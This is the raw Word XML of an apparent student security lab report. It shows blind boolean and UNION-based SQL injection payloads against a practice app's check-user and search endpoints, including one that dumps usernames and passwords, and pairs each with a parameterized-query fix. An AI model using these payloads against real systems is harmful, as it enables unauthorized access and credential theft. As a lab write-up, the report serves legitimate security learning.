        <w:t>Location: GET /api/check-user?u=  (used by the "Forgot username?" page). The endpoint only returns true/false for whether a username exists, but that single bit is enough to extract data one character at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01978D6B" w14:textId="2E18F7F9" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Probe TRUE:   admin' AND substr(password,1,1)='S' --   -&gt; exists:true  (admin's password does start with S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52976A6D" w14:textId="15DAC196" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Probe FALSE:  admin' AND substr(password,1,1)='A' --   -&gt; exists:false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A61212F" w14:textId="314EAF42" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32A637B7" wp14:editId="68266514">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="212624313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243132"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D09273" w14:textId="0E6FF15D" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E47460D" w14:textId="6FAB00C7" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E49B760" wp14:editId="2DCE8DE5">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="131485464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854646"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15872892" w14:textId="778B3128" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14E6317A" w14:textId="5E04E0FF" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Fix (safe mode): the query is parameterized, so the whole input is treated as a literal username. Only an exact username match can return true, and the injected condition is inert:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE06BBB" w14:textId="4B760D6E" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AEE14A6" wp14:editId="5B462A38">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="50145557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455572"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F2FDC0" w14:textId="31E9CA76" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F18FDD" w14:textId="0B2907C0" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc242551132"/>
      <w:r>
        <w:t>2.8  SQL Injection - Advanced (UNION-based extraction)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="687DCB3B" w14:textId="3CEA80AF" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Location: GET /search?q=  The results query returns three columns (id, description, amount), which lets an attacker append a UNION SELECT to read arbitrary tables. SQLite's sqlite_master is the analogue of MySQL's information_schema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3740F7E4" w14:textId="5272B95F" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Stage 1 - list the database tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E88A51" w14:textId="010F40E9" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x%' UNION SELECT 1, name, 3 FROM sqlite_master WHERE type='table' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6605062C" w14:textId="1F92BA1C" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AFA7938" wp14:editId="25557A6B">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="157017022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170225"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ABEA7E" w14:textId="7108DF50" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="267621AD" w14:textId="1CF6BDD8" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Stage 2 - dump the credentials from the users table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E8DE98" w14:textId="38B01E39" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x%' UNION SELECT id, username || ':' || password, 0 FROM users --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FBFC3E" w14:textId="09CADAD8" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="463A51E2" wp14:editId="662144B3">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="57733584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335846"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1A30FE" w14:textId="7DD66E0A" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Fix (safe mode): a parameterized LIKE binds the search term as data, so the UNION payload is treated as a literal string to search for and simply returns no matches - no table or credential leakage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45789D81" w14:textId="79680D9E" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27DF5A8A" wp14:editId="09DFB4A1">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="139743396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433968"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD54FB" w14:textId="7C6C0714" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="233A8669" w14:textId="1743256A" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc242551134"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Part 3 - Red Team Engagement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="10934F04" w14:textId="1F878600" w:rsidR="00A65037" w:rsidRDefault="00796CD7" w:rsidP="00A65037">
      <w:r>
        <w:t>Question 3 is showing google redirect so nothing can be performed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D283A07" w14:textId="77777777" w:rsidR="00796CD7" w:rsidRPr="00A65037" w:rsidRDefault="00796CD7" w:rsidP="00A65037"/>
    <w:sectPr w:rsidR="00796CD7" w:rsidRPr="00A65037" w:rsidSect="00A65037">
      <w:headerReference w:type="even" r:id="rId28"/>
      <w:headerReference w:type="default" r:id="rId29"/>
      <w:footerReference w:type="even" r:id="rId30"/>
      <w:footerReference w:type="default" r:id="rId31"/>
      <w:headerReference w:type="first" r:id="rId32"/>
      <w:footerReference w:type="first" r:id="rId33"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1296" w:right="1440" w:bottom="1296"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6C2B8B" w14:textId="77777777" w:rsidR="00C66EEF" w:rsidRDefault="00C66EEF" w:rsidP="00A65037">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="57EB4F8A" w14:textId="77777777" w:rsidR="00C66EEF" w:rsidRDefault="00C66EEF" w:rsidP="00A6503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ED76BC" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00895E93">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:framePr w:wrap="around"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p w14:paraId="5E799E2E" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A6503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F0E33D" w14:textId="194A65F1" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00895E93">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:framePr w:wrap="around"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p w14:paraId="3B76866F" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">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394142" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A6503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53A0F4" w14:textId="77777777" w:rsidR="00C66EEF" w:rsidRDefault="00C66EEF" w:rsidP="00A65037">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="60789D54" w14:textId="77777777" w:rsidR="00C66EEF" w:rsidRDefault="00C66EEF" w:rsidP="00A65037">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97F4AE" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A6503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C76F62" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A6503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569D20" w14:textId="77777777" w:rsidR="00A65037" w:rsidRDefault="00A6503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10723A70"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ListBullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="13439682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5037"/>
    <w:rsid w:val="0049782A"/>
    <w:rsid w:val="005D3D8D"/>
    <w:rsid w:val="00796CD7"/>
    <w:rsid w:val="00A65037"/>
    <w:rsid w:val="00B72869"/>
    <w:rsid w:val="00C66EEF"/>
    <w:rsid w:val="00E529AE"/>
    <w:rsid w:val="00EA1F7D"/>
    <w:rsid w:val="00F7607E"/>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2F44E6C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6B559D5A-8398-4B2C-9D0F-01A27E65E6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40" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00A650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650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6503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650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650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650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50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50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50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503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6503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6503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650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650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650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50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50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5037"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00A6503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50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50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50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5037"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00A65037"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A65037"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00A65037"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00A650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65037"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00A65037"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A65037"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A65037"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A65037"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A65037"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A65037"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A65037"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A65037"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A65037"/>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footer" Target="footer3.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footer" Target="footer1.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xm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45</TotalTime>
  <Pages>17</Pages>
  <Words>1827</Words>
  <Characters>10417</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hadi wasim</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>hadi wasim</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-10T13:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-11T11:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>